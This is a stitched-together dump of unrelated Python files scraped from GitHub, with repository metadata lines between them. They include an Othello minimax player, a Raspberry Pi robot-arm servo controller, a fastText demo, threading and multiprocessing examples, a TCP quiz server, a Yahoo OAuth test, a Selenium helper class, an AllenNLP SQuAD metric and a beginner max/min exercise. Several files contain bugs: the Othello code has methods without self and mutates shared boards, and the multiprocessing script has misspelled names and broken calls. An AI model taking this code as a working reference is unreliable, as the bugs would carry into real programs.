directions = [-11, -10, -9, -1, 1, 9, 10, 11]
class TreeNode:
val = None
left = None
right = None
def __init__(self, val, left, right):
self.val = val
self.left = left
self.right = right
def setLeft(l):
self.left = l
def setRight(r):
self.right = r
def setVal(v):
self.val = v
def getLeft():
return left
def getRight():
return right
def getVal():
return val
def mobility(board,player):
return len(get_legal_moves(board,opponent_color(player)))
def stableCount(board, player):
count = 0
for square in board:
if isStable(board, player, square):
count = count + 1
return count
def isStable(board, player, square):
opp = opponent_color(player)
for d in directions:
k = square + d
while board[k] != 3:
if board[k] == 0 or board[k] == opp:
test = k-d
while board[test] != 3:
if board[test] == 0 or board[test] == opp:
return False
test = test-d
k = k + d
return True
def bracket(board, player, square):
opp = opponent_color(player)
for d in directions:
k = square + d
if board[k] is not opp:
continue
while board[k] is opp:
k = k + d
if board[k] is player:
k = k - d
while k != square:
board[k] = player
k = k - d
def would_bracket(board, player, square):
opp = opponent_color(player)
for d in directions:
k = square + d
if board[k] is not opp:
continue
while board[k] is opp:
k = k + d
if board[k] is player:
return True
return False
def get_legal_moves(board, player):
possible = []
for row in range(10, 90, 10):
for col in range(1, 9):
square = row + col
if board[square] is not empty:
continue
if would_bracket(board, player, square):
possible.append(square)
return possible
def opponent_color(player):
if player is black:
return white
return black
def pick(board,player):
poss = get_legal_moves(board,player)
maxscore = 0
from random import choice
if len(poss) < 1:
return None
move = choice(poss)
for child in poss:
test = board
test[child] = player
bracket(test, player, child)
h = minimax(test,player,10,stableCount)
if h > maxscore:
maxscore = h
move = child
if h == 0:
for child in poss:
test = board
test[child] = player
bracket(test, player, child)
h = minimax(test,player,10,mobility)
if h > maxscore:
maxscore = h
move = child
return move
def minimax(board,player,depth,score):
if depth == 0:
return score(board,player)
else:
h = -9999
poss = get_legal_moves(board,player)
for child in poss:
a = 0
if child in [12,16,21,22,27,28,71,72,77,78,82,87]:
a = -1
test = board
test[child] = player
bracket(test, player, child)
h = max(h+a, -minimax(test,opponent_color(player),depth-1,score))
return h
|
caelan/TJHSST-Artificial-Intelligence
|
Othello/JasmineDragon.py
|
JasmineDragon.py
|
py
| 2,788 |
python
|
en
|
code
| 0 |
github-code
|
6
|
44914350526
|
#!/usr/bin/env python3
#/*
# Terminal User input
# Manual Mode where the coordinate and orientation variables are input
# Doesn't use accelerometer
#*/
# Import essential libraries
import requests #type: ignore
import numpy as np #type: ignore
import imutils #type: ignore
import time
import math
from datetime import datetime
import adafruit_adxl34x # type: ignore
import sys
import cv2 #type: ignore
import os
import RPi.GPIO as GPIO #type: ignore
import serial #type: ignore
import matplotlib.pyplot as plt #type: ignore
sys.path.append('/home/pi/Chromebook-projects/projects/proj_Hexclaw')
from IK_module import *
from h2_module import *
from board import SCL, SDA # type: ignore
import busio # type: ignore
from adafruit_motor import servo # type: ignore
from adafruit_servokit import ServoKit # type: ignore
from adafruit_pca9685 import PCA9685 # type: ignore
i2c = busio.I2C(SCL, SDA)
pca = PCA9685(i2c)
pca.frequency = 50
servo = [servo.Servo(pca.channels[0]),
servo.Servo(pca.channels[1]),
servo.Servo(pca.channels[2]),
servo.Servo(pca.channels[3]),
servo.Servo(pca.channels[4]),
servo.Servo(pca.channels[5]),
]
for i in range(6):
servo[i].set_pulse_width_range(500, 2500)
sendToServo(servo,[135,45,180,45,180,90],0,mode=0)
time.sleep(1)
GPIO.setmode(GPIO.BCM) # GPIO Numbers instead of board numbers
ledRelay = 23
GPIO.setup(ledRelay, GPIO.OUT) # GPIO Assign mode
GPIO.output(ledRelay, GPIO.LOW) # out
GPIO.output(ledRelay, GPIO.HIGH) # on
time.sleep(0.75)
sendToServo(servo,[90,115,135,90,115,90],1,mode=2)
if False:
for _ in range(4):
GPIO.output(ledRelay, False)
time.sleep(0.03)
GPIO.output(ledRelay, True)
time.sleep(0.03)
time.sleep(1.5)
GPIO.output(ledRelay, False)
time.sleep(0.25)
GPIO.output(ledRelay, True)
time.sleep(0.5)
GPIO.output(ledRelay, False)
time.sleep(0.1)
GPIO.output(ledRelay, True)
time.sleep(2)
GPIO.output(ledRelay, False)
print("------")
time.sleep(2)
GPIO.output(ledRelay, True)
diagnostics = False
if diagnostics:
ard_port = '/dev/ttyUSB0'
ser_arduino = serial.Serial(ard_port, 9600, timeout=0.1)
ser_arduino.reset_input_buffer()
x_Values = [] #time/seconds passed since start of program
y0_Values = [] #voltage
y1_Values = 6*[[]] #absolute rotation difference/jump for each *individual motor*
y2_Values = [] #total absolute rotation difference (i.e. the "jump" in movement for that iteration)
y3_Values = 6*[[]] #*estimated* stagnant load on each motor (Nm)
GraphTitles = ["Voltage","new rotation","total new rotation","torque per motor"]
Graph_yLabel = ["Voltage [V]","Angle [degrees]","Angle [degrees]","Torque [Nm]"]
axisFilter = 0.7 #On the new value end
xScaling, yScaling, zScaling = 0.8, 0.8, 1.2
brightVal = 75
diffCheck = 100
showImage = False
globalPrint = True
endAnglePrint = False
firstAnglePrint = False
posOption = '-'
q = [0]*6 #NOTE: q = q[0] = servo[0]
s = [0, 0, 0, 0, 0, 0, 0] #The variables that are sent to the servos
zMax = 300
a, b, Y = toRadians(0), toRadians(-45), toRadians(90)
PP = [0, 200, 200]
coord = ""
drawing = False # true if mouse is pressed
buttonPressed = False
x1,y1,x2,y2 = -1,-1,-1,-1
windowRes = (600,300)
# mouse callback function
def mouseTrack(event,x,y,flags,param):
global x1,y1,x2,y2,drawing,buttonPressed,img,temp
x2,y2 = x,y
if drawing:
img = np.zeros((windowRes[1],windowRes[0],3), np.uint8)
if event == cv2.EVENT_LBUTTONDOWN:
drawing = True
x1,y1 = x2,y2
elif event == cv2.EVENT_MOUSEMOVE:
buttonPressed = True
if drawing == True:
cv2.line(img,(0,y2),(windowRes[0],y2),(255,255,255),1)
cv2.line(img,(x2,0),(x2,windowRes[1]),(255,255,255),1)
cv2.circle(img,(x2,y2),10,(0,0,255),1)
cv2.putText(img,"("+str(int(x2-windowRes[0]*0.5))+","+str(int(windowRes[1]-y2))+")",(x2+10,y2),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255))
cv2.circle(img,(int(windowRes[0]*0.5),int(windowRes[1])),50,(255,255,255),1)
cv2.circle(img,(int(windowRes[0]*0.5),int(windowRes[1])),100,(255,255,255),1)
cv2.circle(img,(int(windowRes[0]*0.5),int(windowRes[1])),150,(255,255,255),1)
cv2.circle(img,(int(windowRes[0]*0.5),int(windowRes[1])),200,(255,255,255),1)
cv2.putText(img,str(PP),(10,20),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255))
temp = img
elif event == cv2.EVENT_LBUTTONUP:
buttonPressed = False
drawing = False
img = temp #type: ignore
# cv2.line(img,(0,y2),(windowRes[0],y2),(255,255,255),1)
# cv2.line(img,(x2,0),(x2,windowRes[1]),(255,255,255),1)
# cv2.circle(img,(x2,y2),10,(0,0,255),1)
# cv2.putText(img,"("+str(int(x2-windowRes[0]*0.5))+","+str(int(windowRes[1]-y2))+")",(x2+10,y2),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255))
def main():
global PP, a, b, Y
mode = 0
mod_code = "q4"
print(" Different modes for tracking/moving:")
print(" 0. Run movement commands from .dat file")
print(" 1. Enter position and orientation in terminal")
print(" 2. Mouse position tracking on window")
print(" 3. Move end-effector in a pattern")
option = input(" input: ")
if option == "exit": return
else: mode = int(option)
# "under" = given < 0
# "over" = given < 180
servoExceeded = False
whichServoExceeded = 6*[False]
typeOfExceeded = 6*["null"]
start_time = time.time()
x = 1 # displays the frame rate every 1 second
counter = 0
while True:
# os.system("clear")
print("\n ---Enter mode_(n) to change mode to (n)--- ")
print(" - \"debug\" to enter debug-mod menu")
print(" - \"mode_(n)\" to change mode to n")
PP = [0, 200, 200]
while True:
isReachable = [True]
if mode==0:
tempInput_1 = input("Enter file path:")
if tempInput_1 == "exit": return
elif tempInput_1[:4] == "mode": mode=int(tempInput_1[5:])
else:
movCommPath = tempInput_1
runFromFile(movCommPath, servo)
break
if mode==1:
tempInput_1 = input("Enter coordinates [x y z] in mm: ").split()
if tempInput_1[0] == "exit": return
elif tempInput_1[0][:4] == "mode": mode=int(tempInput_1[0][5:])
elif tempInput_1[0] == "debug": debug_mod_menu(mod_dict)
else:
PP[0] = (float(tempInput_1[0])) # type: ignore
PP[1] = (float(tempInput_1[1])) # type: ignore
PP[2] = (float(tempInput_1[2])) # type: ignore
break
if mode==2:
tempInput_1 = input("Enter z-value in mm: ")
if tempInput_1 == "exit": return
elif tempInput_1[:4] == "mode": mode=int(tempInput_1[5:])
elif tempInput_1 == "debug": debug_mod_menu(mod_dict)
else:
PP[2] = float(tempInput_1) # type: ignore
break
if mode==3:
patternOpt = 1
print("Options:")
print(" 0.run a custom program/course of motions")
print(" 1.choose a pre-defined pattern from a dictionary")
print(" 2.move end-effector along an axis")
print(" 3.move end-effector orientation with a fixed position")
tempInput_1 = input("input: ")
if tempInput_1 == "exit": return
elif tempInput_1[:4] == "mode": mode=int(tempInput_1[5:])
elif tempInput_1 == "debug": debug_mod_menu(mod_dict)
else:
patternOpt = int(tempInput_1)
break
if mode==1:
tempInput_2 = input("Enter orientation values [a b Y] in degrees: ").split()
a,b,Y = toRadians(float(tempInput_2[0])), toRadians(float(tempInput_2[1])), toRadians(float(tempInput_2[2]))
if diagnostics: print("x:", PP[0], " y:", PP[1], " z:", PP[2], " a:", toDegrees(a), " b:", toDegrees(b), " Y:", toDegrees(Y), sep='')
q = getAngles(PP,a,b,Y,'-', debug=mod_dict, positionIsReachable=isReachable)
# print(q)
print("read:",[toDegrees(q) for q in q], "posIsReachable:", isReachable)
if isReachable[0]:
# custom_sendToServo(servo,[toDegrees(angle) for angle in q],0,True)
sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=2,printResult=True)
elif mode==2:
tempInput_2 = input("Enter orientation values [a b Y] in degrees: ").split()
a,b,Y = toRadians(float(tempInput_2[0])), toRadians(float(tempInput_2[1])), toRadians(float(tempInput_2[2]))
img = np.zeros((windowRes[1],windowRes[0],3), np.uint8)
cv2.namedWindow('tracking_window')
cv2.setMouseCallback('tracking_window',mouseTrack)
temp = img
print("\n 'Esc' - change z-value and orientation\n")
while True:
cv2.imshow('tracking_window', img) #use this if the previous drawings are not to be used
k = cv2.waitKey(1) & 0xFF
if k == 27: break
elif k == 119: PP[2]+=10 #type: ignore
elif k == 115: PP[2]-=10 #type: ignore
if drawing:
PP[0], PP[1] = x2-windowRes[0]*0.5,windowRes[1]-y2 # type: ignore
q = getAngles(PP,a,b,Y,'-',positionIsReachable=isReachable, debug=mod_dict)
# print(q)
if isReachable[0]: sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=0)
counter+=1
if (time.time() - start_time) > x :
print("FPS: ", counter / (time.time() - start_time))
counter = 0
start_time = time.time()
cv2.destroyAllWindows()
elif mode==3:
if patternOpt==0: #type: ignore
print("Pick any of these programs")
for key,_ in mov_Programs.items(): print(" - \"",key,"\"", sep='')
key = input("input the program name: ")
if key=="exit": break
presetAngles = 6*[0]
for joint in range(6): presetAngles[joint] = servo[joint].angle / constants_q[joint]["fixed"]
if key=="axisTest" and diagnostics:
mov_Programs[key](
servo,
[diagnostics,x_Values,
[y0_Values,y1_Values,y2_Values,y3_Values],ser_arduino]
)
else: mov_Programs[key](servo)
sendToServo(servo,presetAngles,0,mode=2)
if diagnostics and key=="axisTest":
fig = plt.figure(figsize=(19, 6))
ax = [0,0,0,0]
y_Values = [y0_Values,y1_Values,y2_Values,y3_Values]
for axis in range(len(ax)):
ax[axis] = fig.add_subplot(1,4,axis+1) #type: ignore
ax[axis].set_xlim(0,round(x_Values[-1])) #type: ignore
ax[axis].set_title(GraphTitles[axis]) #type: ignore
ax[axis].set_xlabel("time [seconds]") #type: ignore
ax[axis].set_ylabel(Graph_yLabel[axis]) #type: ignore
ax[axis].grid() #type: ignore
if axis==1 or axis==3:
for j in range(6):
ax[axis].plot(x_Values,y_Values[axis][j],linestyle='solid',label='q'+str(j+1)) #type: ignore
else:
ax[axis].plot(x_Values,y_Values[axis],linestyle='solid') #type: ignore
if axis==0:
ax[axis].axhline( #type: ignore
y=(sum(y_Values[axis])/len(y_Values[axis])),
color='red',linestyle='-',
label=f"avg:{round(sum(y_Values[axis])/len(y_Values[axis]))}V"
)
ax[axis].legend(loc='upper right',framealpha=0.3) #type: ignore
fig.tight_layout(pad=5.0)
fig.suptitle("")
currentDate = str(datetime.now()).replace(" ", ";")
relativePath = "/home/pi/Chromebook-projects/projects/proj_Hexclaw/hexclaw_files/voltage_readings/media/"
fileTitle = "mov_Voltage_"
plt.savefig(relativePath+fileTitle+currentDate+".png") #type: ignore
plt.show()
if patternOpt==1: #type: ignore
print("Pick any of these patterns")
for key,_ in mov_Patterns.items(): print(" - \"",key,"\"", sep='')
key = input("input a key:")
if key=="exit": break
for i in range(len(mov_Patterns[key])):
q = getAngles(
[mov_Patterns[key][i][0],mov_Patterns[key][i][1],mov_Patterns[key][i][2]],
toRadians(mov_Patterns[key][i][3]),
toRadians(mov_Patterns[key][i][4]),
toRadians(mov_Patterns[key][i][5]),
'-',
positionIsReachable=isReachable,
debug=mod_dict
)
print(mov_Patterns[key][i])
if isReachable[0]: sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=2)
time.sleep(1)
elif patternOpt==2: #type: ignore
axis = input("\nEnter what axis to move [x, y or z] [unit: mm]:")
if axis=="exit": break
orientToUse = input("\nEnter orientation for axis test [a, b and Y]:").split()
fullPos = [0,link[4]+link[5]+120,150]
presetAngles = [0,0,0,0,0,0]
for joint in range(6): presetAngles[joint] = servo[joint].angle / constants_q[joint]["fixed"]
prevSent=False
for direction in range(1, -2, -2):
for pos in range(-200, 200):
if axis == "x": fullPos[0] = direction*pos*0.75 #type: ignore #300
if axis == "y": fullPos[1] = direction*pos*0.5+100 #type: ignore #200
if axis == "z": fullPos[2] = direction*pos*0.5+200 #type: ignore #200
q = getAngles(
fullPos,
toRadians(int(orientToUse[0])),toRadians(int(orientToUse[1])),toRadians(int(orientToUse[2])),
'-', positionIsReachable=isReachable,
debug=mod_dict
)
if isReachable[0]:
if prevSent: sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=0)
else:
sendToServo(servo,[toDegrees(joint) for joint in q],2,useDefault=True,mode=2)
time.sleep(1)
prevSent=True
if axis == "x": time.sleep(0.005)
else: time.sleep(0.001)
time.sleep(1.5)
sendToServo(servo,presetAngles,0,mode=2)
elif patternOpt==3: #type: ignore
orientToUse = input("\nEnter what orientation to test [a, b or Y] [unit: degrees]:")
posToUse = input("\nEnter coordinate for position test [x, y and z]:").split()
for _ in range(3): posToUse[_] = int(posToUse[_]) #type: ignore
fullOrient = [0,0,0]
presetAngles = [0,0,0,0,0,0]
for joint in range(6): presetAngles[joint] = servo[joint].angle / constants_q[joint]["fixed"]
for direction in range(1, -2, -2):
for angle in range(-90, 90):
if orientToUse == "a": fullOrient[0] = direction*angle
if orientToUse == "b": fullOrient[1] = direction*angle
if orientToUse == "Y": fullOrient[2] = direction*angle
q = getAngles(posToUse,toRadians(fullOrient[0]),toRadians(int(fullOrient[1])),toRadians(int(fullOrient[2])),
'-',positionIsReachable=isReachable,
debug=mod_dict
)
if isReachable[0]: sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=0)
time.sleep(0.01)
time.sleep(1.5)
sendToServo(servo,presetAngles,0,mode=2)
# input("\npaused. Press enter to continue...")
if __name__ == "__main__":
main()
sendToServo(servo,[135,45,180,45,180,90],1,mode=2)
GPIO.output(ledRelay, False)
pca.deinit()
|
Quark3e/Chromebook-projects
|
projects/proj_Hexclaw/in rpi/Hexclaw_Main_2.py
|
Hexclaw_Main_2.py
|
py
| 17,353 |
python
|
en
|
code
| 2 |
github-code
|
6
|
27251458016
|
"""
文件名: Code/Chapter09/C05_FastText/main.py
创建时间: 2023/7/22 10:31 上午
作 者: @空字符
公众号: @月来客栈
知 乎: @月来客栈 https://www.zhihu.com/people/the_lastest
"""
import logging
from gensim.models import KeyedVectors
import fasttext
from fasttext.util import reduce_model
import sys
import os
sys.path.append('../../')
from utils import DATA_HOME
def load_fasttext_model():
path_to_model = os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.zh.300.bin')
# path_to_model = os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.zh.300.vec.gz')
# model = KeyedVectors.load_word2vec_format(path_to_model, binary=False)
ft = fasttext.load_model(path_to_model)
logging.info(f"词向量的维度: {ft.get_dimension()}")
logging.info(f"中国: {ft.get_word_vector('中国')}")
logging.info(f"与中国最相似的5个词为: {ft.get_nearest_neighbors('中国', k=5)}")
logging.info(ft.get_subwords("跟我一起学深度学习"))
reduce_model(ft, 100) # 降维
logging.info(f"词向量的维度: {ft.get_dimension()}")
path_to_model = os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.zh.100.bin')
ft.save_model(path_to_model)
def get_get_analogies():
ft = fasttext.load_model(os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.zh.300.bin'))
logging.info('有凤来仪' in ft.words)
logging.info(f"与东坡居士最相似的5个词为: {ft.get_nearest_neighbors('有凤来仪', k=5)}")
logging.info(ft.get_analogies("柏林", "德国", "法国", k=5))
# False
# 与有凤来仪最相似的5个词为: [(0.457183, 'Viscosity'), (0.454175, 'viscosity'), (0.361536, 'thb'), (0.343013, 'kg/m2'), (0.335760, 'Dirham')]
# [(0.743810, '巴黎'), (0.583832, '里昂'), (0.555544, '法國'), (0.547275, '斯特拉斯堡'), (0.536760, '坎城')]
ft = fasttext.load_model(os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.en.300.bin'))
logging.info('accomodtion' in ft.words)
logging.info(f"与accomodtion最相似的5个词为: {ft.get_nearest_neighbors('accomodation', k=5)}")
logging.info(ft.get_analogies("berlin", "germany", "france", k=5))
# False
# 与accomodtion最相似的5个词为: [(0.858731, 'accomadation'), (0.828016, 'acommodation'), (0.822644, 'accommodation'), (0.821873, 'accomdation'), (0.793275, 'Accomodation')]
# [(0.730373, 'paris'), (0.640853, 'france.'), (0.639331, 'avignon'), (0.631667, 'paris.'), (0.589559, 'montpellier')]
if __name__ == '__main__':
# load_fasttext_model()
get_get_analogies()
|
moon-hotel/DeepLearningWithMe
|
Code/Chapter09/C05_FastText/main.py
|
main.py
|
py
| 2,582 |
python
|
en
|
code
| 116 |
github-code
|
6
|
75386038906
|
import threading
import time
def worker():
count = 0
while True:
if (count >= 5):
# raise RuntimeError()
break
time.sleep(1)
print("I'm working")
count += 1
t = threading.Thread(target=worker, name='worker') # 线程对象.
t.start() # 启动.
print("==End==")
|
hashboy1/python
|
MultiThread.py
|
MultiThread.py
|
py
| 332 |
python
|
en
|
code
| 0 |
github-code
|
6
|
45626436566
|
import threading
import socket
class Estatisticas:
def __init__(self):
self.questoes = {}
def atualizar_estatisticas(self, num_questao, acertos, erros):
self.questoes[num_questao] = {'acertos': acertos, 'erros': erros}
def obter_estatisticas(self):
return self.questoes
def tratar_conexao(conn, addr, estatisticas):
print("Cliente conectado:", addr)
while True:
data = conn.recv(1024).decode()
if not data:
break
num_questao, _, respostas = data.split(";")
acertos, erros = calcular_acertos_erros(respostas)
estatisticas.atualizar_estatisticas(num_questao, acertos, erros)
resposta = f"Questão: {num_questao}; Acertos: {acertos}; Erros: {erros}"
conn.send(resposta.encode())
print("Cliente desconectado:", addr)
conn.close()
def calcular_acertos_erros(respostas):
acertos = respostas.count('V')
erros = respostas.count('F')
return acertos, erros
def iniciar_servidor(host, port):
estatisticas = Estatisticas()
servidor = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
servidor.bind((host, port))
servidor.listen(5)
print("Servidor iniciado. Aguardando conexões...")
while True:
conn, addr = servidor.accept()
thread = threading.Thread(target=tratar_conexao, args=(conn, addr, estatisticas))
thread.start()
if __name__ == "__main__":
host = "127.0.0.1"
port = 8888
iniciar_servidor(host, port)
|
GabsLUZ/Atividade-SD
|
TCP/servidor.py
|
servidor.py
|
py
| 1,552 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
8665774694
|
import os
import json
from botocore.exceptions import ClientError
from unittest import TestCase
from unittest.mock import patch
from exceptions import YahooOauthError
from login_yahoo_authorization_url import LoginYahooAuthorizationUrl
class TestLoginYahooAuthorizationUrl(TestCase):
@classmethod
def setUpClass(cls):
os.environ['YAHOO_CLIENT_ID'] = 'fake_yahoo_consumer_key'
os.environ['YAHOO_SECRET'] = 'fake_yahoo_consumer_secret'
os.environ['YAHOO_OAUTH_CALLBACK_URL'] = 'http://localhost'
def test_exec_main_ok(self):
with patch('login_yahoo_authorization_url.YahooUtil') as yahoo_mock:
yahoo_mock.return_value.get_authorization_url.return_value = 'oauth_url'
response = LoginYahooAuthorizationUrl({}, {}).main()
self.assertEqual(response['statusCode'], 200)
self.assertEqual(
json.loads(response['body']),
{'url': 'oauth_url'}
)
def test_exec_main_ng_with_clienterror(self):
with patch('login_yahoo_authorization_url.YahooUtil') as yahoo_mock:
yahoo_mock.return_value.generate_auth_url.side_effect = ClientError(
{'Error': {'Code': 'UserNotFoundException'}},
'operation_name'
)
response = LoginYahooAuthorizationUrl({}, {}).main()
self.assertEqual(response['statusCode'], 500)
self.assertEqual(
json.loads(response['body']),
{'message': 'Internal server error: LoginYahooAuthorizationUrl'}
)
def test_exec_main_ng_with_yahoo(self):
with patch('login_yahoo_authorization_url.YahooUtil') as yahoo_mock:
yahoo_mock.return_value.generate_auth_url.side_effect = YahooOauthError(
endpoint='http://example.com',
status_code=400,
message='error'
)
response = LoginYahooAuthorizationUrl({}, {}).main()
self.assertEqual(response['statusCode'], 500)
self.assertEqual(
json.loads(response['body']),
{'message': 'Internal server error: LoginYahooAuthorizationUrl'}
)
|
AlisProject/serverless-application
|
tests/handlers/login/yahoo/authorization_url/test_login_yahoo_authorization_url.py
|
test_login_yahoo_authorization_url.py
|
py
| 2,213 |
python
|
en
|
code
| 54 |
github-code
|
6
|
2668239466
|
import multiprocessing
from time import ctime
def consumer(input_q):
print("Into consumer:",ctime())
while True:
# 处理项
item = input_q.get()
print ("pull",itemm,"out of q")#此处代替为有用的工作
input_q.tast_done()#发出信号通知任务完成
print("Out of consumer:",ctime())##此句末执行,因为q.join()信号后,主进程启动,为等到print此语句完
def prodeuce(sequence,out_q):
print("Inpo producer ",ctime())
for item in sequence:
output_q.put(item)
print("put",item,"into q")
print("Out of producer",ctime())
if __name__ == '__main__':
q = multiprocessing.JoinableQueue()
#运行消费者进程
cons_p = multiprocessing.Process(target= consumer, args = (q,1))
cons_p.daemon = True
cons_p.start()
#在生产多个项,sqeuence代表要发送个消费者的项的序列
#在实践中,这可能是生成器的输出或通过一些其他生产方式出来
sequence = [1,2,3,4]
prodeuce(sequence,q)
q.join()
|
Sssssww/pycharm
|
多线程/22.py
|
22.py
|
py
| 1,065 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23391926789
|
from selenium import webdriver
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
import json
from pathlib import Path
from time import sleep
from selm.gales import settings
class Gale():
def __init__(self, implicitly_wait=12):
option = webdriver.ChromeOptions()
# 防止打印一些无用的日志
option.add_experimental_option(
"excludeSwitches", ['enable-automation', 'enable-logging'])
# 初始化driver
self.driver = webdriver.Chrome(options=option)
# 设置浏览器窗口大小
# self.driver.maximize_window()
self.driver.set_window_rect(-7, 0, 1190, 1047)
# 设置隐性等待时间
self.driver.implicitly_wait(implicitly_wait)
def get_url(self, url: str):
'''页面访问
Args:
url (str): url地址
'''
self.driver.get(url)
def get_url_by_cookies(self, url: str, cookies_path: Path):
'''带cookies的页面访问
Args:
url (str): 登录网址
cookies_path (Path): cookies储存地址
'''
self.get_url(url)
cookies = json.loads(open(cookies_path).read())
for c in cookies:
self.driver.add_cookie(c)
self.get_url(url)
# self.driver.refresh()
def get_cookies(self, url: str, file_path: Path, user_data: dict, input_time: int = 12):
'''获取cookies
Args:
url (str): 登录网址
file_path (Path): cookies储存路径
user_data (dict): 用户登录数据
{
"账号":(css_selector, str),
"密码":(css_selector, str),
...
"login": css_selector
}
input_time (int, optional): Defaults to 12. 用户输入验证码的时间
'''
self.get_url(url)
for i in user_data:
if i == 'login':
continue
for selector, content in user_data[i]:
self.find_by_selector(selector).send_keys(content)
# button_cache.send_keys(content)
# 等待用户手动输入验证码
sleep(input_time)
self.find_by_selector(user_data["login"]).click()
cookies = self.driver.get_cookies()
with open(file_path, "w", encoding="utf-8") as f:
f.write(json.dumps(cookies))
def find_by_id(self, id):
'''通过id查找元素
Args:
id (str): id路径
Returns:
WebElement: WebElement对象
'''
return self.driver.find_element_by_id(id)
def find_by_selector(self, selector):
'''通过css属性查找webelement元素
Args:
selector (str): css属性
Returns:
WebElement: WebElement对象
'''
return self.driver.find_element_by_css_selector(selector)
def find_by_xpath(self, xpath):
'''通过xpath查找元素
Args:
xpath (str): xpath路径
Returns:
WebElement: WebElement对象
'''
return self.driver.find_element_by_xpath(xpath)
def wait_clickable(self, ele_path, by="selector", time=10):
'''等待元素可以被点击
'''
if by == "selector":
return WebDriverWait(self.driver, time).until(EC.element_to_be_clickable(
(By.CSS_SELECTOR, ele_path)))
elif by == "xpath":
return WebDriverWait(self.driver, time).until(EC.element_to_be_clickable(
(By.XPATH, ele_path)))
else:
raise TypeError(f"not type {by}")
def wait_presence(self, ele_path, by="selector", time=10):
'''显性等待元素出现,如果元素在规定时间内出现就返回该元素
Args:
ele_path (str): 与by对应的属性路径
by (str, optional): Defaults to "selector". [还可以是xpath等]
time (int, optional): Defaults to 10. [默认的显性等待时间]
Raises:
TypeError: 不存在的by方法
Returns:
WebElement: 如果元素在规定时间内被查找到则返回该元素WebElement对象
'''
if by == "selector":
return WebDriverWait(self.driver, time).until(EC.presence_of_element_located(
(By.CSS_SELECTOR, ele_path)))
elif by == "xpath":
return WebDriverWait(self.driver, time).until(EC.presence_of_element_located(
(By.XPATH, ele_path)))
else:
raise TypeError(f"not type {by}")
def wait_not_presence(self, ele_path, by="selector", time=10):
'''等待元素不存在
'''
if by == "selector":
return WebDriverWait(self.driver, time).until_not(EC.presence_of_element_located(
(By.CSS_SELECTOR, ele_path)))
elif by == "xpath":
return WebDriverWait(self.driver, time).until_not(EC.presence_of_element_located(
(By.XPATH, ele_path)))
else:
raise TypeError(f"not type {by}")
def wait_visibility(self, ele_path, by="selector", time=10):
'''等待元素对用户可见
'''
if by == "selector":
return WebDriverWait(self.driver, time).until(EC.visibility_of_element_located(
(By.CSS_SELECTOR, ele_path)))
elif by == "xpath":
return WebDriverWait(self.driver, time).until(EC.visibility_of_element_located(
(By.XPATH, ele_path)))
else:
raise TypeError(f"not type {by}")
def wait_invisibility(self, ele_path, by="selector", time=10):
'''等待元素对用户不可见
'''
if by == "selector":
return WebDriverWait(self.driver, time).until(EC.invisibility_of_element_located(
(By.CSS_SELECTOR, ele_path)))
elif by == "xpath":
return WebDriverWait(self.driver, time).until(EC.invisibility_of_element_located(
(By.XPATH, ele_path)))
else:
raise TypeError(f"not type {by}")
def save2png(self, file_name):
'''获取当前浏览器窗口屏幕截图
Args:
file_name (str): 图片名(图片默认存放到data目录下)
'''
file_path = settings.DATA_DIR / file_name
self.driver.get_screenshot_as_file(str(file_path))
sleep(1)
def close(self):
'''关闭当前窗口
'''
self.driver.close()
def quit(self):
'''关闭整个浏览器
'''
self.driver.quit()
def refresh(self):
'''刷新
'''
self.driver.refresh()
|
tyutltf/xaioliangzatan
|
selm/gales/gale.py
|
gale.py
|
py
| 6,838 |
python
|
en
|
code
| 1 |
github-code
|
6
|
43634658293
|
from __future__ import division
from __future__ import absolute_import
#typing
#overrides
from allennlp.common import squad_eval
from allennlp.training.metrics.metric import Metric
class SquadEmAndF1(Metric):
u"""
This :class:`Metric` takes the best span string computed by a model, along with the answer
strings labeled in the data, and computed exact match and F1 score using the official SQuAD
evaluation script.
"""
def __init__(self) :
self._total_em = 0.0
self._total_f1 = 0.0
self._count = 0
#overrides
def __call__(self, best_span_string, answer_strings):
u"""
Parameters
----------
value : ``float``
The value to average.
"""
exact_match = squad_eval.metric_max_over_ground_truths(
squad_eval.exact_match_score,
best_span_string,
answer_strings)
f1_score = squad_eval.metric_max_over_ground_truths(
squad_eval.f1_score,
best_span_string,
answer_strings)
self._total_em += exact_match
self._total_f1 += f1_score
self._count += 1
#overrides
def get_metric(self, reset = False) :
u"""
Returns
-------
Average exact match and F1 score (in that order) as computed by the official SQuAD script
over all inputs.
"""
exact_match = self._total_em / self._count if self._count > 0 else 0
f1_score = self._total_f1 / self._count if self._count > 0 else 0
if reset:
self.reset()
return exact_match, f1_score
#overrides
def reset(self):
self._total_em = 0.0
self._total_f1 = 0.0
self._count = 0
def __str__(self):
return "SquadEmAndF1(em={self._total_em}, f1={self._total_f1})"
SquadEmAndF1 = Metric.register(u"squad")(SquadEmAndF1)
|
plasticityai/magnitude
|
pymagnitude/third_party/allennlp/training/metrics/squad_em_and_f1.py
|
squad_em_and_f1.py
|
py
| 1,963 |
python
|
en
|
code
| 1,607 |
github-code
|
6
|
41244754700
|
'''Faça um programa que leia três numeros e mostre qual é o maior e qual é o menor'''
n1 = int(input('Digite um número: '))
n2 = int(input('Digite um número: '))
n3 = int(input('Digite um número: '))
maior = n1
if n2 > n1:
maior = n2
if n3 > maior:
maior = n3
menor = n1
if n2 < n1:
menor = 2
if n3 < menor:
menor = n3
print('maior: {} \nmenor: {}'.format(maior,menor))
'''
outra forma
maior = menor = 0
numero = []
for n in range(0,3):
numero.append(int(input(f'Digite o {n +1}º número: ')))
numero.sort()
print(f'Menor número: {numero[0]}')
